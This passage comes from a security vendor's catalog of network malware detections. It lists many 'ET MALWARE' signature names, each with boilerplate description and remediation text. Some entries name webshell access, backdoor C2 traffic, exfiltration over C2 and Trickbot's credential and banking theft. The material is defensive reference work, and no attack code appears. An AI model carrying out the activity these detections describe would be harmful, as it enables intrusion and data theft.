Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible ReactorBot .bin Download

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Red October proxy CnC 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Red October proxy CnC 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Red October proxy CnC 3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Schneebly Posting ScreenShot

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Sharik/Smoke Loader 7zip Connectivity Check

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Sharik/Smoke Loader Microsoft Connectivity check

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Sharik/Smoke Loader Microsoft Connectivity check M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Sharik/Smoke Loader Microsoft Connectivity check M3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Sinkhole banner

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible SKyWIper/Win32.Flame POST

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible SQUIRRELWAFFLE Server Response

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible STEADYPULSE Webshell Accessed M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible STEADYPULSE Webshell Accessed M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Stitur Secondary Download

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible TDSS User-Agent CMD

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible TickGroup Casper CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible TickGroup Coolbee/Avenger CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible TickGroup Snack CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Tracur.Q HTTP Communication

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible TransparentTribe APT CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible T-RAT Encrypted Zip Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible TRAT proxy component user agent detected

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Trojan.APT.9002 POST

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Tunna Proxy Activity (Response)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Tunna Proxy Activity (Response)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Tunna Proxy Closing Connection

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Tunna Proxy Closing Connection

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Turla Carbon Paper CnC Beacon (Fake User-Agent)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Possible UNC1878 Cobalt Strike CnC SSL Cert Inbound (Mountainvew)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible UNC1878/FIN12 Cobalt Strike CnC SSL Cert Inbound (lol)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible UNC1878/FIN12 Cobalt Strike CnC SSL Cert Inbound (office)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible UNC1878/FIN12 Cobalt Strike CnC SSL Cert Inbound (Texsa)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Upatre Downloader SSL certificate

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Upatre or Dyre SSL Cert Jan 22 2015

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible W32/Citadel Download From CnC Server Self Referenced /files/ attachment

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible W32/KanKan tools.ini Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible W32/KanKan Update officeaddinupdate.xml Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible W32/VBKlip BAN Download

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Win32.Bicololo Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Win32/Dimegup.A Downloading Image Common URI Struct

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Win32/Gapz MSIE 9 on Windows NT 5

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Win32/Get2 Downloader Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Win32/Hupigon ip.txt with a Non-Mozilla UA

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Win32/Napolar.A URL Response

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Win32/Petya Conn Check

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Win32/Qbot/Quakbot Checkin via HTTP GET

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Win32/SillyFDC WordPress Traffic

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Win32/SysJoker Retrieving CnC Information (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Win32/Travnet.A Internet Connection Check (microsoft.com)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Windows executable sent when remote host claims to send a Text File

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Winnti TLS Certificate Observed

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Winnti TLS Certificate Observed

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Winnti TLS SNI Observed

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Winnti TLS SNI Observed

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Worm W32.Svich or Other Infection Request for setting.doc

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Worm W32.Svich or Other Infection Request for setting.xls

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Zbot Activity Common Download Struct

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Zeus GameOver Connectivity Check

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Zeus GameOver Connectivity Check 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Zeus P2P Variant Check-in

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possibly SLIGHTPULSE Related - Suspicious POST to Specific URI Path

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Potao CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Potao CnC POST Response

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Potential Blackhole Exploit Pack Binary Load Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Potential FakeAV HTTP GET Check-IN (/check)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Potential FakePAV Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Potentially Unwanted Program RebateInformerSetup.exe Download Reporting

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Poweliks Abnormal HTTP Headers high likelihood of Poweliks infection

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Poweliks Clickfraud CnC M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Poweliks Clickfraud CnC M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Poweliks Clickfraud CnC M3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Poweliks Clickfraud CnC M4

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Powershell commands sent when remote host claims to send an image

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE PowerShell Downloader CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Powershell Octopus Backdoor Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Powershell Octopus Backdoor Activity (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Powershell Octopus Backdoor Sending System Information (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE PowerShell Script Downloading Emotet DLL

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Powershell with Decimal Encoded RUNPE Downloaded

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE PowerTrick download bot known key

Description
Copy link

Trickbot is a modular Trojan That was initially developed as a banking Trojan in 2016. Trickbot has evolved into a complex, modular framework, which can also operate as a dropper for follow-up malware, such as Ryuk and/or various post-exploitation frameworks, such as Empire, Cobalt Strike, or Meterpreter. Trickbot is delivered to systems via malspam campaigns using various phishing themes and document lure types.

Trickbot uses various anti-analysis mechanisms and stores its configuration as an encrypted file on disk. Trickbot is rapidly updated with new modules that provide the malware with additional capabilities. These modules include capabilities, such as credential harvesting, network information gathering, system reconnaissance, banking information theft, network propagation, and persistence.

Recommendation
Copy link

Restore systems impacted by Trickbot to a known, good baseline image that has been validated by your organization, as persistence artifacts change frequently. Provide electronic social engineering user training, and advise users to not interact with attachments or URLs in suspicious emails.

ET MALWARE PowerTrick download ver1 bot

Description
Copy link

Trickbot is a modular Trojan That was initially developed as a banking Trojan in 2016. Trickbot has evolved into a complex, modular framework, which can also operate as a dropper for follow-up malware, such as Ryuk and/or various post-exploitation frameworks, such as Empire, Cobalt Strike, or Meterpreter. Trickbot is delivered to systems via malspam campaigns using various phishing themes and document lure types.

Trickbot uses various anti-analysis mechanisms and stores its configuration as an encrypted file on disk. Trickbot is rapidly updated with new modules that provide the malware with additional capabilities. These modules include capabilities, such as credential harvesting, network information gathering, system reconnaissance, banking information theft, network propagation, and persistence.

Recommendation
Copy link

Restore systems impacted by Trickbot to a known, good baseline image that has been validated by your organization, as persistence artifacts change frequently. Provide electronic social engineering user training, and advise users to not interact with attachments or URLs in suspicious emails.

ET MALWARE PowerTrick download ver2 bot

Description
Copy link

Trickbot is a modular Trojan That was initially developed as a banking Trojan in 2016. Trickbot has evolved into a complex, modular framework, which can also operate as a dropper for follow-up malware, such as Ryuk and/or various post-exploitation frameworks, such as Empire, Cobalt Strike, or Meterpreter. Trickbot is delivered to systems via malspam campaigns using various phishing themes and document lure types.

Trickbot uses various anti-analysis mechanisms and stores its configuration as an encrypted file on disk. Trickbot is rapidly updated with new modules that provide the malware with additional capabilities. These modules include capabilities, such as credential harvesting, network information gathering, system reconnaissance, banking information theft, network propagation, and persistence.

Recommendation
Copy link

Restore systems impacted by Trickbot to a known, good baseline image that has been validated by your organization, as persistence artifacts change frequently. Provide electronic social engineering user training, and advise users to not interact with attachments or URLs in suspicious emails.

ET MALWARE PowerTrick Known Key 1

Description
Copy link

Trickbot is a modular Trojan That was initially developed as a banking Trojan in 2016. Trickbot has evolved into a complex, modular framework, which can also operate as a dropper for follow-up malware, such as Ryuk and/or various post-exploitation frameworks, such as Empire, Cobalt Strike, or Meterpreter. Trickbot is delivered to systems via malspam campaigns using various phishing themes and document lure types.

Trickbot uses various anti-analysis mechanisms and stores its configuration as an encrypted file on disk. Trickbot is rapidly updated with new modules that provide the malware with additional capabilities. These modules include capabilities, such as credential harvesting, network information gathering, system reconnaissance, banking information theft, network propagation, and persistence.

Recommendation
Copy link

Restore systems impacted by Trickbot to a known, good baseline image that has been validated by your organization, as persistence artifacts change frequently. Provide electronic social engineering user training, and advise users to not interact with attachments or URLs in suspicious emails.

ET MALWARE PowerTrick Known Key 2

Description
Copy link

Trickbot is a modular Trojan That was initially developed as a banking Trojan in 2016. Trickbot has evolved into a complex, modular framework, which can also operate as a dropper for follow-up malware, such as Ryuk and/or various post-exploitation frameworks, such as Empire, Cobalt Strike, or Meterpreter. Trickbot is delivered to systems via malspam campaigns using various phishing themes and document lure types.

Trickbot uses various anti-analysis mechanisms and stores its configuration as an encrypted file on disk. Trickbot is rapidly updated with new modules that provide the malware with additional capabilities. These modules include capabilities, such as credential harvesting, network information gathering, system reconnaissance, banking information theft, network propagation, and persistence.

Recommendation
Copy link

Restore systems impacted by Trickbot to a known, good baseline image that has been validated by your organization, as persistence artifacts change frequently. Provide electronic social engineering user training, and advise users to not interact with attachments or URLs in suspicious emails.

ET MALWARE PowerTrick Task Answer

Description
Copy link

Trickbot is a modular Trojan That was initially developed as a banking Trojan in 2016. Trickbot has evolved into a complex, modular framework, which can also operate as a dropper for follow-up malware, such as Ryuk and/or various post-exploitation frameworks, such as Empire, Cobalt Strike, or Meterpreter. Trickbot is delivered to systems via malspam campaigns using various phishing themes and document lure types.

Trickbot uses various anti-analysis mechanisms and stores its configuration as an encrypted file on disk. Trickbot is rapidly updated with new modules that provide the malware with additional capabilities. These modules include capabilities, such as credential harvesting, network information gathering, system reconnaissance, banking information theft, network propagation, and persistence.

Recommendation
Copy link

Restore systems impacted by Trickbot to a known, good baseline image that has been validated by your organization, as persistence artifacts change frequently. Provide electronic social engineering user training, and advise users to not interact with attachments or URLs in suspicious emails.

ET MALWARE PowerTrick Task Checkin M1

Description
Copy link

Trickbot is a modular Trojan That was initially developed as a banking Trojan in 2016. Trickbot has evolved into a complex, modular framework, which can also operate as a dropper for follow-up malware, such as Ryuk and/or various post-exploitation frameworks, such as Empire, Cobalt Strike, or Meterpreter. Trickbot is delivered to systems via malspam campaigns using various phishing themes and document lure types.

Trickbot uses various anti-analysis mechanisms and stores its configuration as an encrypted file on disk. Trickbot is rapidly updated with new modules that provide the malware with additional capabilities. These modules include capabilities, such as credential harvesting, network information gathering, system reconnaissance, banking information theft, network propagation, and persistence.

Recommendation
Copy link

Restore systems impacted by Trickbot to a known, good baseline image that has been validated by your organization, as persistence artifacts change frequently. Provide electronic social engineering user training, and advise users to not interact with attachments or URLs in suspicious emails.

ET MALWARE PowerTrick Task Checkin M2

Description
Copy link

Trickbot is a modular Trojan That was initially developed as a banking Trojan in 2016. Trickbot has evolved into a complex, modular framework, which can also operate as a dropper for follow-up malware, such as Ryuk and/or various post-exploitation frameworks, such as Empire, Cobalt Strike, or Meterpreter. Trickbot is delivered to systems via malspam campaigns using various phishing themes and document lure types.

Trickbot uses various anti-analysis mechanisms and stores its configuration as an encrypted file on disk. Trickbot is rapidly updated with new modules that provide the malware with additional capabilities. These modules include capabilities, such as credential harvesting, network information gathering, system reconnaissance, banking information theft, network propagation, and persistence.

Recommendation
Copy link

Restore systems impacted by Trickbot to a known, good baseline image that has been validated by your organization, as persistence artifacts change frequently. Provide electronic social engineering user training, and advise users to not interact with attachments or URLs in suspicious emails.

ET MALWARE PowerTrick Task Request

Description
Copy link

Trickbot is a modular Trojan That was initially developed as a banking Trojan in 2016. Trickbot has evolved into a complex, modular framework, which can also operate as a dropper for follow-up malware, such as Ryuk and/or various post-exploitation frameworks, such as Empire, Cobalt Strike, or Meterpreter. Trickbot is delivered to systems via malspam campaigns using various phishing themes and document lure types.

Trickbot uses various anti-analysis mechanisms and stores its configuration as an encrypted file on disk. Trickbot is rapidly updated with new modules that provide the malware with additional capabilities. These modules include capabilities, such as credential harvesting, network information gathering, system reconnaissance, banking information theft, network propagation, and persistence.

Recommendation
Copy link

Restore systems impacted by Trickbot to a known, good baseline image that has been validated by your organization, as persistence artifacts change frequently. Provide electronic social engineering user training, and advise users to not interact with attachments or URLs in suspicious emails.

ET MALWARE PPI User-Agent (InstallCapital)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE PRG/wnspoem/Zeus InfoStealer Trojan Config Download

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

